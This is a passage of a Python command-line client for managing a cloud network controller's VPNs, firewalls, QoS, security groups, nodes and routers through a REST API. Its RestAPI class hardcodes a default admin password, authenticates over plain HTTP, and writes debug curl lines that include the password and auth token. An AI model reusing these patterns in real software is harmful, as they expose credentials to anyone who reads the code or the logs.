help='Pre-shared key')\n self.create_parser.add_argument('-l', '--local-endpoint', required=True, help='Local endpoint')\n self.create_parser.add_argument('-p', '--peer-endpoint', required=True, help='Peer endpoint')\n parser.set_defaults(func=self.cmd_connection)\n\n def cmd_connection(self, args):\n debug_out('cmd_connection: ', args)\n self.cmd_base(args)\n if 'ike' in args:\n self.res.ike = self.name_to_id(IkePolicy(), args.ike)\n if 'ipsec' in args:\n self.res.ipsec = self.name_to_id(IpsecPolicy(), args.ipsec)\n if 'service' in args:\n self.res.service = self.name_to_id(VpnService(), args.service)\n if 'peer_ip' in args:\n self.res.peer_ip = args.peer_ip\n if 'peer_id' in args:\n self.res.peer_id = args.peer_id\n if 'psk' in args:\n self.res.psk = args.psk\n if 'local_endpoint' in args:\n self.res.local_endpoint = self.name_to_id(VpnEndpiointGroup(), args.local_endpoint)\n if 'peer_endpoint' in args:\n self.res.peer_endpoint = self.name_to_id(VpnEndpiointGroup(), args.peer_endpoint)\n self.cmd_action()\n\nclass parser_p2s(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = VpnP2SConnection()\n self.create_parser.add_argument('-a', '--auth-mode', help='\"cert\" only')\n self.create_parser.add_argument('--ca', help='CA cert, pem format')\n self.create_parser.add_argument('-k', '--server-key', help='Private key in server, pem format')\n self.create_parser.add_argument('-c', '--server-cert', help='CA cert in sever, pem format')\n self.create_parser.add_argument('-e', '--exp-list', help='Expired cert, pem format')\n self.create_parser.add_argument('-v', '--vpn-service', help='VPN Service')\n self.create_parser.add_argument('-s', '--local-subnets', nargs='+', help='Prefix client can access. Must be connected with router.')\n self.create_parser.add_argument('-p', '--pool', nargs='+', help='Client used address pool, not overlap with router subnet. Only one v4 and v6')\n self.update_parser.add_argument('--ca', help='CA cert, pem format')\n self.update_parser.add_argument('-k', '--server-key', help='Private key in server, pem format')\n self.update_parser.add_argument('-c', '--server-cert', help='CA cert in sever, pem format')\n self.update_parser.add_argument('-e', '--exp-list', help='Expired cert, pem format')\n msg = '''{action/interval/timeout}\n action: clear, hold, restart, disabled or restart-by-peer, default hold\n interval: default 30s\n timeout: default 120s\n '''\n self.create_parser.add_argument('--dpd', help=msg)\n self.create_parser.add_argument('--mss', help='TCP mss, default 1200')\n parser.set_defaults(func=self.cmd_p2s)\n\n def cmd_p2s(self, args):\n debug_out('cmd_p2s: ', args)\n self.cmd_base(args)\n if 'auth_mode' in args:\n self.res.auth_mode = args.auth_mode\n if 'ca' in args:\n self.res.cert = args.ca\n if 'vpn_service' in args:\n self.res.service = self.name_to_id(VpnService(), args.vpn_service)\n if 'server_key' in args:\n self.res.server_key = args.server_key\n if 'server_cert' in args:\n self.res.server_cert = args.server_cert\n if 'exp_list' in args:\n self.res.exp_cert_list = args.exp_list\n if 'local_subnets' in args:\n self.res.local_subnets = args.local_subnets\n if 'pool' in args:\n self.res.address_pool = args.pool\n if 'mss' in args:\n self.res.tcp_mss = args.mss\n if 'dpd' in args:\n self.res.dpd = json.loads(args.dpd)\n self.cmd_action()\n\nclass parser_fw(parser_base):\n def __init__(self, parser):\n self.parser = parser\n subparser = self.parser.add_subparsers()\n firewall = subparser.add_parser('firewall', help='Firewall group')\n parser_firewall(firewall)\n policy = subparser.add_parser('policy', help='Firewall policy')\n parser_policy(policy)\n rule = subparser.add_parser('rule', help='Policy rule')\n parser_fwrule(rule)\n parser.set_defaults(func=self.cmd_fw)\n\n def cmd_fw(self, args):\n self.parser.print_usage()\n\nclass parser_firewall(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Firewall()\n self.create_parser.add_argument('-p', '--policy', nargs='+', help='Policy to be associated')\n self.create_parser.add_argument('--project', nargs='+', help='Project to be associated')\n self.create_parser.add_argument('--network', nargs='+', help='Netwrok to be associated')\n self.create_parser.add_argument('--port', nargs='+', help='Port to be associated')\n\n self.update_parser.add_argument('-p', '--policy', nargs='+', help='Policy to be associated')\n self.update_parser.add_argument('--project', nargs='+', help='Project to be associated')\n self.update_parser.add_argument('--network', nargs='+', help='Netwrok to be associated')\n self.update_parser.add_argument('--port', nargs='+', help='Port to be associated')\n\n parser.set_defaults(func=self.cmd_firewall)\n\n def cmd_firewall(self, args):\n debug_out('cmd_firewall: ', args)\n self.cmd_base(args)\n if 'policy' in args:\n self.res.policys = [self.name_to_id(FwPolicy(), p) for p in args.policy]\n if 'project' in args:\n self.res.projects = args.project\n if 'network' in args:\n self.res.networks = [self.name_to_id(VirtualNetwork(), n) for n in args.network]\n if 'port' in args:\n self.res.ports = [self.name_to_id(Port(), p) for p in args.port]\n self.cmd_action()\n\nclass parser_policy(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = FwPolicy()\n self.create_parser.add_argument('-r', '--rules', nargs='+', help='Rule to be associated')\n self.create_parser.add_argument('--audited', type=bool)\n self.update_parser.add_argument('-r', '--rules', nargs='+', help='Rule to be associated')\n self.update_parser.add_argument('--audited', type=bool)\n self.insert_parser = self.operparser.add_parser('insert', argument_default=argparse.SUPPRESS, help='insert a rule')\n self.insert_parser.add_argument('--oper', default='insert', help=argparse.SUPPRESS)\n self.insert_parser.add_argument('-r', '--rule')\n self.insert_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.insert_parser.add_argument('-b', '--before', metavar='RULE', help='Insert before this rule')\n self.insert_parser.add_argument('-a', '--after', metavar='RULE', help='Insert after this rule')\n self.remove_parser = self.operparser.add_parser('remove', argument_default=argparse.SUPPRESS, help='remove a rule')\n self.remove_parser.add_argument('--oper', default='remove', help=argparse.SUPPRESS)\n self.remove_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.remove_parser.add_argument('-r', '--rule', metavar='RULE', help='Remove this rule')\n parser.set_defaults(func=self.cmd_policy)\n\n def cmd_policy(self, args):\n debug_out('cmd_policy: ', args)\n self.cmd_base(args)\n if 'rules' in args:\n self.res.rules = [self.name_to_id(FwRule(), r) for r in args.rules]\n if 'audited' in args:\n self.res.audited = args.audited\n if 'rule' in args:\n self.res.rule = self.name_to_id(FwRule(), args.rule)\n if 'before' in args:\n self.res.insert_before = self.name_to_id(FwRule(), args.before)\n if 'after' in args:\n self.res.resource['insert_after'] = self.name_to_id(FwRule(), args.after)\n self.cmd_action()\n\nclass parser_fwrule(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = FwRule()\n self.create_parser.add_argument('--src-ip', help='Source IP to be matched')\n self.create_parser.add_argument('--src-port', help='Source port to be matched')\n self.create_parser.add_argument('--dest-ip', help='Destination IP to be matched')\n self.create_parser.add_argument('--dest-port', help='Destination port to be matched')\n self.create_parser.add_argument('-p', '--protocol', help='Protocol to be matched')\n self.create_parser.add_argument('-v', '--version', choices=['4','6'])\n self.create_parser.add_argument('--action', choices=['deny','allow'])\n parser.set_defaults(func=self.cmd_rule)\n\n def cmd_rule(self, args):\n debug_out('cmd_rule: ', args)\n self.cmd_base(args)\n if 'src_ip' in args:\n self.res.src_ip = args.src_ip\n if 'src_port' in args:\n self.res.src_port = args.src_port\n if 'dest_ip' in args:\n self.res.dest_ip = args.dest_ip\n if 'dest_port' in args:\n self.res.dest_port = args.dest_port\n if 'protocol' in args:\n self.res.protocol = args.protocol\n if 'version' in args:\n self.res.version = args.version\n if 'action' in args:\n self.res.action = args.action\n self.cmd_action()\n\nclass parser_qos(parser_base):\n def __init__(self, parser):\n self.parser = parser\n subparser = self.parser.add_subparsers()\n ratelimit = subparser.add_parser('ratelimit', help='Qos configuration')\n parser_ratelimit(ratelimit)\n ipgroup = subparser.add_parser('ipgroup', help='IP group rate limit')\n parser_ipgroup(ipgroup)\n parser.set_defaults(func=self.cmd_qos)\n\n def cmd_qos(self, args):\n self.parser.print_usage()\n\nclass parser_ratelimit(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Qos()\n self.create_parser.add_argument('-d', '--direction', choices=['ingress','egress'])\n self.create_parser.add_argument('--dscp', nargs='*', help='Dscp marking rules')\n self.create_parser.add_argument('-r', '--rate', help='Max rate with bit')\n self.update_parser.add_argument('-r', '--rate', help='Max rate with bit')\n self.update_parser.add_argument('--dscp', nargs='*', help='Dscp marking rules')\n parser.set_defaults(func=self.cmd_ratelimit)\n\n def cmd_ratelimit(self, args):\n debug_out('cmd_ratelimit: ', args)\n self.cmd_base(args)\n if 'direction' in args:\n self.res.direction = args.direction\n if 'rate' in args:\n self.res.rate = args.rate\n if 'dscp' in args:\n self.res.resource['dscp_marking_rules'] = args.dscp\n self.cmd_action()\n\nclass parser_ipgroup(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = IpGroup()\n self.create_parser.add_argument('-n', '--net', help='Network to be ratelimited')\n self.create_parser.add_argument('--ip', nargs='+', help='IP addresses to be ratelimited')\n self.create_parser.add_argument('-p', '--protocol', choices=['tcp','udp'])\n self.create_parser.add_argument('--port', nargs='+', help='TCP/UDP port')\n self.create_parser.add_argument('-r', '--ratelimit', help='Qos rate limit to be associated')\n\n self.update_parser.add_argument('--ip', nargs='+', help='IP addresses to be ratelimited')\n self.update_parser.add_argument('-p', '--protocol', choices=['tcp','udp'])\n self.update_parser.add_argument('--port', nargs='+', help='TCP/UDP port')\n self.update_parser.add_argument('-r', '--ratelimit', help='Qos rate limit to be associated')\n parser.set_defaults(func=self.cmd_ipgroup)\n\n def cmd_ipgroup(self, args):\n debug_out('cmd_ipgroup: ', args)\n self.cmd_base(args)\n if 'net' in args:\n self.res.net = self.name_to_id(args.net)\n if 'ip' in args:\n self.res.ip = args.ip\n if 'protocol' in args:\n self.res.protocol = args.protocol\n if 'port' in args:\n self.res.port = [self.name_to_id(Port(), p) for p in args.port]\n if 'ratelimit' in args:\n self.res.ratelimit = args.ratelimit\n self.cmd_action()\n\nclass parser_sg(parser_base):\n def __init__(self, parser):\n self.parser = parser\n subparser = self.parser.add_subparsers()\n group = subparser.add_parser('group', help='Security group')\n parser_group(group)\n rule = subparser.add_parser('rule', help='Security group rule')\n parser_sgrule(rule)\n parser.set_defaults(func=self.cmd_sg)\n\n def cmd_sg(self, args):\n self.parser.print_usage()\n\nclass parser_group(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = SecurityGroup()\n self.create_parser.add_argument('-d', '--direction', choices=['ingress', 'egress'])\n self.create_parser.add_argument('-a', '--action', choices=['accept', 'deny'], nargs='+', help='IP addresses to be ratelimited')\n self.create_parser.add_argument('-p', '--protocol')\n self.create_parser.add_argument('--port', type=RANGE, metavar='MIN:MAX', help='TCP/UDP port')\n self.create_parser.add_argument('--priority', help='Priority of this rule')\n self.create_parser.add_argument('-v', '--ethertype', choices=['IPv4', 'IPv6'], help='Priority of this rule')\n\n parser.set_defaults(func=self.cmd_group)\n\n def cmd_group(self, args):\n debug_out('cmd_group: ', args)\n self.cmd_base(args)\n rule = {}\n if 'direction' in args:\n rule['direction'] = args.direction\n if 'action' in args:\n rule['action'] = args.action\n if 'protocol' in args:\n rule['protocol'] = args.protocol\n if 'port' in args:\n rule['port'] = args.port\n if 'priority' in args:\n rule['priority'] = args.priority\n if 'ethertype' in args:\n rule['ethertype'] = args.ethertype\n if rule:\n self.res.rules = [rule]\n self.cmd_action()\n\nclass parser_sgrule(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = SecurityGroupRule()\n self.create_parser.add_argument('-d', '--direction', choices=['ingress', 'egress'])\n self.create_parser.add_argument('-a', '--action', choices=['accept', 'deny'], nargs='+', help='IP addresses to be ratelimited')\n self.create_parser.add_argument('-p', '--protocol')\n self.create_parser.add_argument('--port', type=RANGE, metavar='MIN:MAX', help='TCP/UDP port')\n self.create_parser.add_argument('--priority', help='Priority of this rule')\n self.create_parser.add_argument('-v', '--ethertype', choices=['IPv4', 'IPv6'])\n self.create_parser.add_argument('--enable', type=BOOL)\n self.create_parser.add_argument('--group', help='Security group associated with')\n\n self.update_parser.add_argument('-d', '--direction', choices=['ingress', 'egress'])\n self.update_parser.add_argument('-a', '--action', choices=['accept', 'deny'], nargs='+', help='IP addresses to be ratelimited')\n self.update_parser.add_argument('-p', '--protocol')\n self.update_parser.add_argument('--port', type=RANGE, metavar='MIN:MAX', help='TCP/UDP port')\n self.update_parser.add_argument('--priority', help='Priority of this rule')\n self.update_parser.add_argument('-v', '--ethertype', choices=['IPv4', 'IPv6'])\n self.update_parser.add_argument('--enable', type=BOOL)\n parser.set_defaults(func=self.cmd_rule)\n\n def cmd_rule(self, args):\n debug_out('cmd_rule: ', args)\n self.cmd_base(args)\n if 'direction' in args:\n self.res.resource['direction'] = args.direction\n if 'action' in args:\n self.res.resource['action'] = args.action\n if 'protocol' in args:\n self.res.resource['protocol'] = args.protocol\n if 'port' in args:\n self.res.resource['port'] = args.port\n if 'priority' in args:\n self.res.resource['priority'] = args.priority\n if 'ethertype' in args:\n self.res.resource['ethertype'] = args.ethertype\n if 'enable' in args:\n self.res.resource['enabled'] = args.enable\n if 'group' in args:\n self.res.resource['security_group_id'] = self.name_to_id(SecurityGroup(), args.group)\n self.cmd_action()\n\nclass parser_provider(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Provider()\n self.create_parser.add_argument('-i', '--interfaces', type=kv, metavar='HOST=NIC', nargs='+', help='Interface for public network')\n self.update_parser.add_argument('-i', '--interfaces', type=kv, metavar='HOST=NIC', nargs='+', help='Interface for public network')\n self.list_parser.add_argument('--nic', action='store_true', help='Show nic status of provider')\n parser.set_defaults(func=self.cmd_provider)\n\n def cmd_provider(self, args):\n debug_out(sys._getframe().f_code.co_name, ': ', args)\n self.cmd_base(args)\n if 'interfaces' in args:\n interfaces = []\n for intf in args.interfaces:\n i = intf.split('=')\n interfaces.append({'host': i[0], 'nic': i[1]})\n self.res.interfaces = interfaces\n self.cmd_action()\n def cmd_list(self, args):\n if 'nic' in args:\n self.res.url = '/neutron/provider_nic_status'\n super().cmd_list(args)\n\nclass parser_nodes():\n def __init__(self, parser):\n self.res = ResBase()\n self.action = None\n\n self.parser = parser\n self.parser.add_argument('--type', required=True,\n choices=['vrouter', 'control', 'config', 'configdb', 'analytics', 'analyticsdb'],\n help='Staled node type')\n self.operparser = parser.add_subparsers()\n self.list_parser = self.operparser.add_parser('list')\n self.list_parser.set_defaults(func=self.cmd_list)\n\n self.delete_parser = self.operparser.add_parser('delete')\n self.delete_parser.add_argument('--hostname', required=True, help='Hostame of staled vrouter')\n #self.delete_parser.add_argument('--ip', required=True, help='IP of staled vrouter')\n self.delete_parser.set_defaults(func=self.cmd_delete)\n\n def cmd_list(self, args):\n debug_out(sys._getframe().f_code.co_name, ': ', args)\n nodes_map = {'vrouter': 'virtual-routers', 'control': 'bgp-routers', 'config': 'config-nodes',\n 'configdb': 'config-database-nodes', 'analytics': 'analytics-nodes', 'analyticsdb': 'database-nodes'}\n self.res.url = '/' + nodes_map[args.type]\n self.action = ResourceAction(self.res)\n self.action.get()\n\n def cmd_delete(self, args):\n nodes_map = {'vrouter': 'virtual-router', 'control': 'bgp-router', 'config': 'config-node',\n 'configdb': 'config-database-node', 'analytics': 'analytics-node', 'analyticsdb': 'database-node'}\n default_fq = ['default-global-system-config', args.hostname]\n nodes_fqname = {'vrouter': default_fq, 'config': default_fq, 'configdb': default_fq, 'analytics': default_fq, 'analyticsdb': default_fq,\n 'control': ['default-domain', 'default-project', 'ip-fabric', '__default__', args.hostname]}\n debug_out('cmd_vrouter: ', args)\n self.action = ResourceAction(self.res)\n res_id = self.action.fqname_to_id(nodes_map[args.type], nodes_fqname[args.type])\n if not res_id:\n print(f'error: node {args.hostname} not found')\n return\n # delete node\n if args.type == 'vrouter':\n # delete vmi for vrouter\n vmi = default_fq + ['vhost0']\n vmi_id = self.action.fqname_to_id('virtual-machine-interface', vmi)\n if vmi_id:\n self.res.url = f\"/virtual-machine-interface/{vmi_id['uuid']}\"\n self.action.set_res(self.res)\n self.action.delete()\n self.res.url = f\"/{nodes_map[args.type]}/{res_id['uuid']}\"\n self.action.set_res(self.res)\n self.action.delete()\n\nclass parser_node(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Node()\n\nclass parser_prouter(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = PhysicalRouter()\n self.create_parser.add_argument('-m', '--mgmt-ip', help='Management IP of switch')\n self.create_parser.add_argument('-c', '--community', help='Community for snmp read')\n self.create_parser.add_argument('--type', choices=['embedded', 'tor-agent', 'tor-service-node'], help='Physical router type')\n self.create_parser.add_argument('--check', type=BOOL, help='Physical router connection check')\n self.update_parser.add_argument('-c', '--community', help='Community for snmp read')\n self.update_parser.add_argument('--router-type', choices=['embedded', 'tor-agent', 'tor-service-node'], help='Physical router type')\n self.update_parser.add_argument('--check', type=BOOL, help='Physical router connection check')\n parser.set_defaults(func=self.cmd_prouter)\n\n def cmd_prouter(self, args):\n debug_out(sys._getframe().f_code.co_name, ': ', args)\n self.cmd_base(args)\n if 'mgmt_ip' in args:\n self.res.mgmt_ip = args.mgmt_ip\n if 'community' in args:\n self.res.snmp = {'v2_community': args.community}\n if 'router_type' in args:\n self.res.router_type = args.router_type\n if 'check' in args:\n self.res.check = args.check\n self.cmd_action()\n\nclass parser_tag(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Tag()\n self.create_parser.add_argument('--type', help='type name')\n self.create_parser.add_argument('--value', help='tag value string')\n self.update_parser.add_argument('--type', help='type name')\n self.update_parser.add_argument('--value', help='tag value string')\n parser.set_defaults(func=self.cmd_tag)\n\n def cmd_tag(self, args):\n debug_out('cmd_tag: ', args)\n self.cmd_base(args)\n if 'type' in args:\n self.res.type_name = args.type\n if 'value' in args:\n self.res.value = args.value\n self.cmd_action()\n\nclass parser_address_group(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = AddressGroup()\n self.create_parser.add_argument('--prefixes', nargs='*', help='list of prefix uuid')\n self.update_parser.add_argument('--prefixes', nargs='*', help='list of prefix uuid')\n parser.set_defaults(func=self.cmd_address_group)\n\n def cmd_address_group(self, args):\n debug_out(sys._getframe().f_code.co_name, ': ', args)\n self.cmd_base(args)\n if 'prefixes' in args:\n self.res.resource['prefixes'] = args.prefixes\n self.cmd_action()\n\nclass parser_service_group(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = ServiceGroup()\n self.create_parser.add_argument('--services', nargs='*', metavar='{\"protocol\":value,\"port\":value}',\n type=json.loads, help='protocol support: TCP/UDP/ICMP')\n self.update_parser.add_argument('--services', nargs='*', metavar='{\"protocol\":value,\"port\":value}',\n type=json.loads, help='protocol support: TCP/UDP/ICMP')\n parser.set_defaults(func=self.cmd_service_group)\n\n def cmd_service_group(self, args):\n debug_out(sys._getframe().f_code.co_name, ': ', args)\n self.cmd_base(args)\n if 'services' in args:\n self.res.resource['services'] = args.services\n self.cmd_action()\n\nclass parser_seg_fw(parser_base):\n def __init__(self, parser):\n self.parser = parser\n subparser = self.parser.add_subparsers()\n firewall = subparser.add_parser('firewall', help='Firewall group')\n parser_seg_firewall(firewall)\n policy = subparser.add_parser('policy', help='Firewall policy')\n parser_seg_policy(policy)\n rule = subparser.add_parser('rule', help='Policy rule')\n parser_seg_fwrule(rule)\n parser.set_defaults(func=self.cmd_fw)\n\n def cmd_fw(self, args):\n self.parser.print_usage()\n\nclass parser_seg_firewall(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = SegFirewall()\n self.create_parser.add_argument('-t', '--tag', nargs='?', help='Tag to be associated')\n self.create_parser.add_argument('-p', '--policy', nargs='*', help='Policy to be associated')\n self.update_parser.add_argument('-t', '--tag', nargs='?', help='Tag to be associated')\n self.update_parser.add_argument('-p', '--policy', nargs='*', help='Policy to be associated')\n parser.set_defaults(func=self.cmd_firewall)\n\n def cmd_firewall(self, args):\n debug_out('cmd_firewall: ', args)\n self.cmd_base(args)\n if 'policy' in args:\n self.res.resource['firewall_policys'] = [self.name_to_id(SegFirewallPolicy(), p) for p in args.policy]\n if 'tag' in args:\n self.res.resource['tag'] = args.tag\n self.cmd_action()\n\nclass parser_seg_policy(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = SegFirewallPolicy()\n self.create_parser.add_argument('-r', '--rules', nargs='*', help='Rule to be associated')\n self.update_parser.add_argument('-r', '--rules', nargs='*', help='Rule to be associated')\n self.insert_parser = self.operparser.add_parser('insert', argument_default=argparse.SUPPRESS, help='insert a rule')\n self.insert_parser.add_argument('--oper', default='insert', help=argparse.SUPPRESS)\n self.insert_parser.add_argument('-r', '--oper-rules', nargs='*')\n self.insert_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.insert_parser.add_argument('-b', '--before', metavar='RULE', help='Insert before this rule')\n self.insert_parser.add_argument('-a', '--after', metavar='RULE', help='Insert after this rule')\n self.remove_parser = self.operparser.add_parser('remove', argument_default=argparse.SUPPRESS, help='remove a rule')\n self.remove_parser.add_argument('--oper', default='remove', help=argparse.SUPPRESS)\n self.remove_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.remove_parser.add_argument('-r', '--oper-rules', nargs='*', metavar='RULE', help='Remove rules')\n parser.set_defaults(func=self.cmd_policy)\n\n def cmd_policy(self, args):\n debug_out('cmd_policy: ', args)\n self.cmd_base(args)\n if 'rules' in args:\n self.res.resource['firewall_rules'] = [self.name_to_id(SegFirewallRule(), r) for r in args.rules]\n if 'oper_rules' in args:\n self.res.resource['oper_rules'] = [self.name_to_id(SegFirewallRule(), r) for r in args.oper_rules]\n if 'before' in args:\n self.res.resource['insert_before'] = self.name_to_id(SegFirewallRule(), args.before)\n if 'after' in args:\n self.res.resource['insert_after']= self.name_to_id(SegFirewallRule(), args.after)\n self.cmd_action()\n\nclass parser_seg_fwrule(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = SegFirewallRule()\n self.create_parser.add_argument('-d', '--direction', choices=['<>', '<', '>'])\n self.create_parser.add_argument('--action', choices=['deny','pass'])\n self.create_parser.add_argument('--match-tags', nargs='*', help='Tags to be matched, available tags are:'\n 'application, deployment, tier, site')\n self.create_parser.add_argument('--service-group', help='Service Group name')\n self.create_parser.add_argument('--service', type=json.loads, metavar='{\"protocol\":value,'\n '\"src_port\":value,\"dst_port\":value}',\n help='Protocol supported:'\n 'ah, dccp, egp, esp, gre, igmp, ospf, pgm,'\n 'rsvp, sctp, udplite, vrrp, icmp6, icmp, tcp, udp, any')\n self.create_parser.add_argument('--endpoint1', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n self.create_parser.add_argument('--endpoint2', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n\n self.update_parser.add_argument('-d', '--direction', choices=['<>', '<', '>'])\n self.update_parser.add_argument('--action', choices=['deny','pass'])\n self.update_parser.add_argument('--match-tags', nargs='*', help='Tags to be matched, available tags are:'\n 'application, deployment, tier, site')\n self.update_parser.add_argument('--service-group', help='Service Group name')\n self.update_parser.add_argument('--service', type=json.loads, metavar='{\"protocol\":value,'\n '\"src_port\":value,\"dst_port\":value}',\n help='Protocol supported:'\n 'ah, dccp, egp, esp, gre, igmp, ospf, pgm,'\n 'rsvp, sctp, udplite, vrrp, icmp6, icmp, tcp, udp, any')\n self.update_parser.add_argument('--endpoint1', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n self.update_parser.add_argument('--endpoint2', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n parser.set_defaults(func=self.cmd_rule)\n\n def cmd_rule(self, args):\n debug_out('cmd_rule: ', args)\n self.cmd_base(args)\n if 'direction' in args:\n self.res.resource['direction'] = args.direction\n if 'action' in args:\n self.res.resource['action'] = args.action\n if 'match_tags' in args:\n self.res.resource['match_tags'] = args.match_tags\n if 'service_group' in args:\n self.res.resource['service_group'] = args.service_group\n if 'service' in args:\n self.res.resource['service'] = args.service\n if 'endpoint1' in args:\n self.res.resource['endpoint_1'] = args.endpoint1\n if 'endpoint2' in args:\n self.res.resource['endpoint_2'] = args.endpoint2\n self.cmd_action()\n\nclass ResourceAction():\n def __init__(self, res_obj):\n self.res = res_obj\n\n config = pasrse_config_file()\n if not config:\n raise Exception('Please generate auth.json for auth info')\n\n self.host = config['host']\n self.port = config['port']\n self.api = RestAPI(auth_host=config['auth_host'], auth_port=config['auth_port'], version=config['version'],\n user=config['user'], password=config['password'], project=config['project'])\n self.url = self.api.encode_url(host=self.host, port=self.port, uri=res_obj.url)\n\n def set_res(self, res_obj):\n self.res = res_obj\n self.url = self.api.encode_url(uri=res_obj.url)\n\n def log(self, msg):\n global format\n if output_format == 'json':\n result = json.dumps(msg, indent=4)\n else:\n result = Table(4)\n result.from_json(msg)\n out(result)\n\n def name_to_id(self, name):\n self.res.filters = { 'name' : name}\n oper = self.res.oper\n self.res.oper = 'READALL'\n res_id = []\n\n code, resources = self.api.req('post', self.url, self.res.body)\n if code != 200:\n raise Exception('Not able to get resource')\n for res in resources:\n res_name = res.get('name')\n if res_name == name:\n res_id.append((res['id'], res.get('fq_name', name)))\n\n idx = 0\n if len(res_id) > 1:\n print('@@ Found multiple %s:' % self.res.type)\n for i in range(len(res_id)):\n print(i, res_id[i])\n idx = input('Please select: ')\n idx = int(idx)\n if idx >= len(res_id):\n raise Exception('Your input not in scope')\n if not res_id:\n raise Exception('Error: %s %s Not Found' % (self.res.type, name))\n self.res.oper = oper\n return res_id[idx][0]\n\n def fqname_to_id(self, res_type, fqname):\n json_body = {'type': res_type, 'fq_name': fqname}\n self.url = self.api.encode_url('/fqname-to-id')\n code, ret = self.api.req('post', self.url, json_body)\n if code != 200:\n print(ret)\n return None\n return ret\n\n def post(self):\n if not self.res.id and self.res.oper != 'CREATE' and self.res.oper != 'READALL':\n try:\n self.res.id = self.name_to_id(self.res.name)\n except Exception as e:\n print(str(e))\n return\n\n code, result = self.api.req('post', self.url, self.res.body)\n if code != 200:\n print(result)\n return\n self.log(result)\n if isinstance(result, list):\n print('Total resources: %s' % len(result))\n\n def put(self):\n code, result = self.api.req('put', self.url, self.res.body)\n if code != 200:\n print(result)\n return\n self.log(result)\n\n def get(self):\n code, result = self.api.req('get', self.url, self.res.body)\n if code != 200:\n print(result)\n return\n self.log(result)\n\n def delete(self):\n code, result = self.api.req('delete', self.url, self.res.body)\n if code != 200:\n print(result)\n\n# Rest API tools for all kinds of resources\nclass RestAPI():\n def __init__(self, auth_host, auth_port='35357', host=None, port=None, version='v2', user='ArcherAdmin',\n password='ArcherAdmin@123', project='ArcherAdmin', domain='Default'):\n self.auth_host = auth_host\n self.auth_port = auth_port\n self.version = version\n self.user = user\n self.password = password\n self.project = project\n self.domain = domain\n self.headers = {'Content-Type': 'application/json'}\n self.token = ''\n self.host = host\n self.port = port\n\n def add_header(self, header):\n self.headers.update(header)\n\n def get_token(self):\n if self.version == 'v3':\n auth_url = 'http://%s:%s/v3/auth/tokens' % (self.auth_host, self.auth_port)\n body = { 'auth': {\n 'identity': {\n 'methods': [\"password\"],\n 'password': {\n 'user': {\n 'name': self.user,\n 'password': self.password,\n 'domain': {\n 'name': \"Default\"\n }\n }\n }\n },\n 'scope': {\n 'project': {\n 'domain': {\n 'name': \"Default\"\n },\n 'name': self.project\n }\n }\n }\n }\n else:\n auth_url = 'http://%s:%s/v2.0/tokens' % (self.auth_host, self.auth_port)\n body = {\n 'auth': {\n 'tenantName':self.project,\n 'passwordCredentials': {\n 'username': self.user,\n 'password': self.password\n }\n }\n }\n header = {'Content-Type': 'application/json'}\n header_str = '-H \"Content-Type:application/json\" '\n DEBUG(\"curl -X POST %s %s-d '%s'\" % (auth_url, header_str, json.dumps(body)))\n try:\n res = requests.post(auth_url, data=json.dumps(body), headers=header)\n except Exception as e:\n print(str(e))\n return None\n if res.status_code == 401:\n return None\n if (self.version == 'v2'):\n token = json.loads(res.text)\n self.token = token['access']['token']['id']\n else:\n self.token = res.headers['x-subject-token']\n self.headers['X-Auth-Token'] = self.token\n return self.token\n\n def req(self, method, url, body=None):\n oper = {\n 'get': requests.get,\n 'post': requests.post,\n 'put': requests.put,\n 'delete': requests.delete\n }\n if not self.token:\n self.get_token()\n self.headers['X-Auth-Token'] = self.token\n data = json.dumps(body) if body else None\n\n header_str = ''\n for (key,value) in self.headers.items():\n header_str += '-H \"%s:%s\" ' % (key, value)\n\n if method not in oper.keys():\n print ('Error: not supported rest method (%s)' % method)\n return None\n\n if method == 'get':\n DEBUG('\\ncurl -X GET \"%s\" %s | python -m json.tool\\n' % (url, header_str))\n else:\n DEBUG(\"\\ncurl -X %s %s %s-d '%s' | python -m json.tool\\n\" % (method.upper(), url, header_str, data))\n\n tm = time.time()\n try:\n res = oper[method](url, data=data, headers=self.headers)\n except Exception as e:\n return 500, str(e)\n print(res.status_code, 'length:', len(res.content), 'time:', time.time()-tm)\n if res.text:\n try:\n if not disable_out:\n DEBUG(json.dumps(res.json()))\n return res.status_code, res.json()\n except:\n if not disable_out:\n DEBUG(res.text)\n return res.status_code, res.text\n else:\n return res.status_code, []\n\n def encode_url(self, uri, host=None, port=None, api_version=None):\n if not host:\n host = self.host\n else:\n self.host = host\n if not port:\n port = self.port\n else:\n self.port = port\n if (api_version is None):\n return 'http://%s:%s%s' % (host, port, uri)\n else:\n return 'http://%s:%s/%s%s' % (host, port, api_version, uri)\n\nclass Table():\n def __init__(self, indent=0):\n self.column = []\n self.raw = []\n self.pretty = []\n self.indent = indent\n self.table = ''\n def add_column(self, column):\n col = [ str(i) for i in column ]\n self.column.append(col)\n def from_json(self, json):\n if isinstance(json, list):\n # multi table\n for item in json:\n self.column = []\n self.add_column(list(item.keys()))\n self.add_column(list(item.values()))\n 